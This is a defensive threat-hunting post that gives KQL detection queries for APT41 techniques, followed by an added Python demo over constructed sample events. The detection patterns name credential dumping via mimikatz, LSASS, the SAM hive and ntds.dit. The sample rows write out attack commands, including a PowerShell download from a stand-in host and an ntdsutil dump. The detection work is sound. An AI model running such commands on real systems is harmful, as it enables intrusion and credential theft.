Hunting APT41 TTPs
Introduction
To directly quote MITRE ATT&CK — “APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.”
In this post, I will go through the references on the APT41 MITRE page and showcase hunting opportunities.
A quick note on how I write hunts: you will see “FileName” filters commented out by default; this is to account for renamed binaries. If needed, you can uncomment these lines to make the search more efficient.
Standard caveats apply:
- Absence of evidence is not evidence of absence — just because you don’t see anything does not mean they are not there
- Evidence of activity is not evidence of actor — these are widely used TTPs, not unique to APT41
- I performed no attribution; I relied on existing references in MITRE ATT&CK
PowerShell
// PowerShell Downloads, DCSync
DeviceProcessEvents
// | where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("WebClient",
"DownloadFile",
"Invoke-DCSync",
"-PWDumpFormat")
or
(ProcessCommandLine contains "Net.Sockets.TCPClient"
and ProcessCommandLine contains "GetStream"
and ProcessCommandLine contains "Invoke-Expression")
LOLBAS Downloads
// BITSAdmin or CertUtil Downloads
DeviceProcessEvents
| where ProcessCommandLine has_any ("bitsadmin", "certutil")
| where ProcessCommandLine has_any ("http", "https")
Lateral Movement & Persistence
// Creating scheduled tasks on remote hosts
DeviceProcessEvents
// | where FileName =~ "schtasks.exe"
| where ProcessCommandLine contains " /create "
| where ProcessCommandLine contains " /s " // Remote host
| where ProcessCommandLine contains " /tr "
// Creating a service on a remote host
DeviceProcessEvents
// | where FileName =~ "sc.exe"
| where ProcessCommandLine contains @"\\"
| where ProcessCommandLine has "create"
| where ProcessCommandLine contains "binPath"
// WMIC Remote Process Creation
DeviceProcessEvents
// | where FileName =~ "wmic.exe"
| where ProcessCommandLine has "process call create"
| where ProcessCommandLine contains "/node:"
// One time scheduled task run
DeviceProcessEvents
// | where FileName =~ "schtasks.exe"
| where ProcessCommandLine has " once "
| where ProcessCommandLine contains " /create "
| where ProcessCommandLine contains " /tr "
Credential Access
// NTDSUtil dumping ntds.dit
DeviceProcessEvents
// | where FileName =~ "ntdsutil.exe"
| where ProcessCommandLine has_any ("activate instance ntds", "ac i ntds")
| where ProcessCommandLine has "create full"
// reg utility to save SAM
DeviceProcessEvents
// | where FileName =~ "reg.exe"
| where ProcessCommandLine has_all ("save", "hklm", "sam")
// ProcDump LSASS or Mimikatz
DeviceProcessEvents
| where ProcessCommandLine has_any ("-accepteula", "lsass.dmp")
or ProcessCommandLine contains "sekurlsa"
or ProcessCommandLine contains "privilege::debug"
// Generic LSASS Dump File
DeviceFileEvents
| where FileName =~ "lsass.dmp"
Enumeration
// Searching for passwords
DeviceProcessEvents
| where ProcessCommandLine has_all ("findstr", "password")
// Various enumeration tasks
DeviceProcessEvents
// | where FileName in~ ("net.exe", "net1.exe")
| where ProcessCommandLine has_any ("localgroup administrators",
"domain admins",
"domain controllers",
"schema admins",
"protected users",
"enterprise admins",
"exchange domain servers",
"systeminfo",
"whoami")
// ping sweep
DeviceProcessEvents
| where ProcessCommandLine has "ping"
| where ProcessCommandLine has " for "
| where ProcessCommandLine has " do "
| where ProcessCommandLine contains "255"
// vssadmin modify shadows, copy ntds.dit or evtx
DeviceProcessEvents
| where (ProcessCommandLine has "vssadmin"
and ProcessCommandLine has_any ("shadow", "shadows"))
or
ProcessCommandLine has_all ("esentutl", "ntds.dit")
or
ProcessCommandLine has_all ("copy", ".evtx")
// DsQuery invocations
DeviceProcessEvents
// | where FileName =~ "dsquery.exe"
| where ProcessCommandLine has_all (" -filter ", " -attr ")
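As an added illustration that is not part of the original post, the Python below approximates KQL's `has` (whole-term, case-insensitive) and `contains` (case-insensitive substring) operators and runs several of the hunts above as predicates over constructed DeviceProcessEvents rows. The device names and command lines are made up for the example; the point is to see which hunt fires on which row and why a `has "create"` term match differs from a `contains` substring match.

```python
import re

# Constructed sample rows in the shape of DeviceProcessEvents (not real telemetry).
EVENTS = [
    {"DeviceName": "ws01", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell -nop -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','a')"},
    {"DeviceName": "dc01", "FileName": "ntdsutil.exe",
     "ProcessCommandLine": 'ntdsutil "ac i ntds" ifm "create full C:\\Temp\\x" q q'},
    {"DeviceName": "ws02", "FileName": "reg.exe",
     "ProcessCommandLine": "reg query hklm\\software\\vendor\\app"},
    {"DeviceName": "ws03", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd /c for /L %i in (1,1,255) do ping -n 1 10.0.0.%i"},
    {"DeviceName": "ws03", "FileName": "sc.exe",
     "ProcessCommandLine": 'sc \\\\srv01 create updsvc binPath= "C:\\Windows\\Temp\\u.exe"'},
    {"DeviceName": "ws04", "FileName": "schtasks.exe",
     "ProcessCommandLine": "schtasks /create /tn Backup /tr C:\\backup.bat /sc daily"},
]

def _terms(s):
    # KQL indexes text as alphanumeric terms; `has` matches whole terms, case-insensitively.
    return re.findall(r"[a-z0-9]+", s.lower())

def has(text, phrase):
    # True when the phrase's terms appear contiguously in the text's terms (approximation of KQL `has`).
    t, p = _terms(text), _terms(phrase)
    return any(t[i:i + len(p)] == p for i in range(len(t) - len(p) + 1))

def has_any(text, phrases): return any(has(text, p) for p in phrases)
def has_all(text, phrases): return all(has(text, p) for p in phrases)
def contains(text, sub): return sub.lower() in text.lower()   # KQL `contains`: case-insensitive substring

# Each hunt is one of the page's `| where` clauses expressed as a predicate over ProcessCommandLine.
HUNTS = {
    "PowerShell download / DCSync": lambda c: has_any(c, ["WebClient", "DownloadFile", "Invoke-DCSync", "-PWDumpFormat"])
        or (contains(c, "Net.Sockets.TCPClient") and contains(c, "GetStream") and contains(c, "Invoke-Expression")),
    "Remote scheduled task": lambda c: contains(c, " /create ") and contains(c, " /s ") and contains(c, " /tr "),
    "Remote service creation": lambda c: contains(c, "\\\\") and has(c, "create") and contains(c, "binPath"),
    "NTDSUtil ntds.dit dump": lambda c: has_any(c, ["activate instance ntds", "ac i ntds"]) and has(c, "create full"),
    "reg save SAM": lambda c: has_all(c, ["save", "hklm", "sam"]),
    "Ping sweep": lambda c: has(c, "ping") and has(c, " for ") and has(c, " do ") and contains(c, "255"),
}

def run_hunts(events):
    """Return sorted (hunt, DeviceName) pairs for every row that a hunt predicate matches."""
    hits = {(name, e["DeviceName"]) for e in events for name, pred in HUNTS.items() if pred(e["ProcessCommandLine"])}
    return sorted(hits)

if __name__ == "__main__":
    for hunt, device in run_hunts(EVENTS):
        print(f"{hunt:30} {device}")
```

Note that the local `schtasks /create ... /sc daily` row does not trigger the remote-task hunt because the `" /s "` check requires the remote-host switch, and the `reg query` row does not trigger the SAM hunt because `has_all` needs the `save` term as well.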
References
Google — This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits
Google — Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments
CrowdStrike — 2020 Global Threat Report